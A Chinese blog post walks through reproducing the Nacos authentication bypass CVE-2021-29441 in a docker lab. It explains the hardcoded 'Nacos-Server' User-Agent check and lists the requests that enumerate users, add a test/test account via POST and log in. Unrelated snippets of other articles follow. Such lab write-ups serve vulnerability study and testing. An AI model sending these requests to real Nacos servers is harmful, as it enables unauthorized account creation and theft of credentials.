首页 > 其他分享 >Nacos 认证绕过漏洞

Nacos 认证绕过漏洞

时间:2023-11-30 10:35:30浏览次数:37  
标签:target nacos Nacos 8848 漏洞 test 认证

Nacos 认证绕过漏洞(CVE-2021-29441)

Nacos是阿里巴巴推出的一个新开源项目,是一个更易于构建云原生应用的动态服务发现,配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。开发者原意时用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

漏洞环境搭建

cd     /nacos/CVE-2021-29441/
docker-compose up -d
docker-compose config

环境运行后,会开放3306、8848、9848、9555端口,在本次漏洞利用中,我们只需要用到8848端口,即web访问端口。执行漏洞验证过程时,请先访问8848端口,确认开放,某些情况下nacos服务会启动失败(无法连接数据库导致),可以重启所有服务

docker-compose restart nacos

漏洞复现

  1. 修改User-Agent的值为Nacos-Server到请求包中
  2. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9查看状态码是否为200,且内容中是否包含pageItems
    img
  3. 使用POST方式访问http://target:8848/nacos/v1/auth/users?username=test&password=test添加一个新用户
    img
  4. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9获取已有的用户列表
    img
  5. 访问http://target:8848/nacos/,使用添加的新用户(test/test)进行登录
    img

标签:target,nacos,Nacos,8848,漏洞,test,认证
From: https://www.cnblogs.com/kalixcn/p/17866720.html

相关文章

  • 标题:计算机考试认证的重要性及应对策略
    摘要:计算机考试认证是现代社会中,评估和确认个人计算机技能水平的重要方式之一。本文旨在探讨计算机考试认证的重要性以及应对策略,以帮助读者更好地理解和应对这一面临的挑战。一、引言随着计算机技术的迅猛发展,计算机已经成为现代社会不可或缺的一部分。然而,与此同时,计算机技术也变......
  • Nacos - 服务发现和配置管理
    Nacos-服务发现和配置管理教学目标1)能够理解微服务架构的特点2)能够理解服务发现的流程3)能够说出Nacos的功能4)掌握Nacos的安装方法5)掌握RESTful服务发现开发方法6)掌握Dubbo服务发现开发方法7)理解Nacos服务发现的数据模型8)能够掌握Nacos配置管理方法9)掌握Nacos扩展配置方......
  • 已解决:若依后台访问 401认证失败,无权限访问系统资源
    暴力解决:简单粗暴,不够优雅若依安全框架采用的是SpringSecurity,所以仅需要在框架层面给他允许就行了,找到找到ruoyi-framework里面的SecurityConfig然后在里面添加你要访问的接口路径,即可放行!如果你的接口还加了别的权限注解,先注释掉,测试通了,再打开。......
  • k8s安全管理认证
    1、SAServiceaccount是为了方便Pod里面的进程调用KubernetesAPI或其他外部服务而设计的。是为Pod中的进程调用KubernetesAPI而设计;仅局限它所在的namespace;每个namespace都会自动创建一个defaultserviceaccount;Tokencontroller检测serviceaccount的创建,并为它......
  • INFINI Console 与华为鲲鹏完成产品兼容互认证
    何为华为鲲鹏认证华为鲲鹏认证是华为云围绕鲲鹏云服务(含公有云、私有云、混合云、桌面云)推出的一项合作伙伴计划,旨在为构建持续发展、合作共赢的鲲鹏生态圈,通过整合华为的技术、品牌资源,与合作伙伴共享商机和利益,助力合作伙伴与华为联合打造基于鲲鹏的联合解决方案,改变国产IT长......
  • Nacos源码(三):SpringCloud-Nacos客户端注册源码分析
    1、服务注册源码入口在笔记(二):Nacos环境搭建中提到Nacos作为注册中心,在服务启动类中可通过添加可选配置注解@EnableDiscoveryClient,那么就先从这个注解入手,开启SpringCloud的Nacos注册中心的源码分析。EnableDiscoveryClient注解详情:EnableDiscoveryClientImport......
  • INFINI Gateway 与华为鲲鹏完成产品兼容互认证
    何为华为鲲鹏认证华为鲲鹏认证是华为云围绕鲲鹏云服务(含公有云、私有云、混合云、桌面云)推出的一项合作伙伴计划,旨在为构建持续发展、合作共赢的鲲鹏生态圈,通过整合华为的技术、品牌资源,与合作伙伴共享商机和利益,助力合作伙伴与华为联合打造基于鲲鹏的联合解决方案,改变国产IT长......
  • 标题:计算机认证考试:铸就专业技能的里程碑
    摘要:计算机认证考试旨在评估个人在计算机领域的专业知识和技能,是提升职业竞争力和求职成功的关键。本文将探讨计算机认证考试的意义,以及有效准备和应对考试的方法。引言:随着计算机技术的迅速发展,计算机专业人才备受市场青睐。然而,在充满竞争的求职环境中,如何证明自己具备高水平的计......
  • mvn spring-boot:run启动项目时报: parse data from Nacos error 错误
    springboot 项目, 通过命令: mvnspring-boot:run 启动时, 在读取nacos配置时, 提示报错如下:c.a.c.n.c.NacosPropertySourceBuilder:parsedatafromNacoserror,dataId:application-dev.yaml,data:spring:xxx.....(此处省略nacos配置)org.yaml.snakeyaml.error.YA......
  • springcloud~spring-cloud-starter-alibaba-nacos-discovery-2021.0.1.0配置方式变更
    nacos的配置方式发生改变,之前的方式不再适用,我们需要进行调整包依赖pom.xml代码,引入基础pom依赖<dependency><groupId>com.alibaba.cloud</groupId><artifactId>spring-cloud-alibaba-dependencies</artifactId><version>2021.0.1.0<</ve......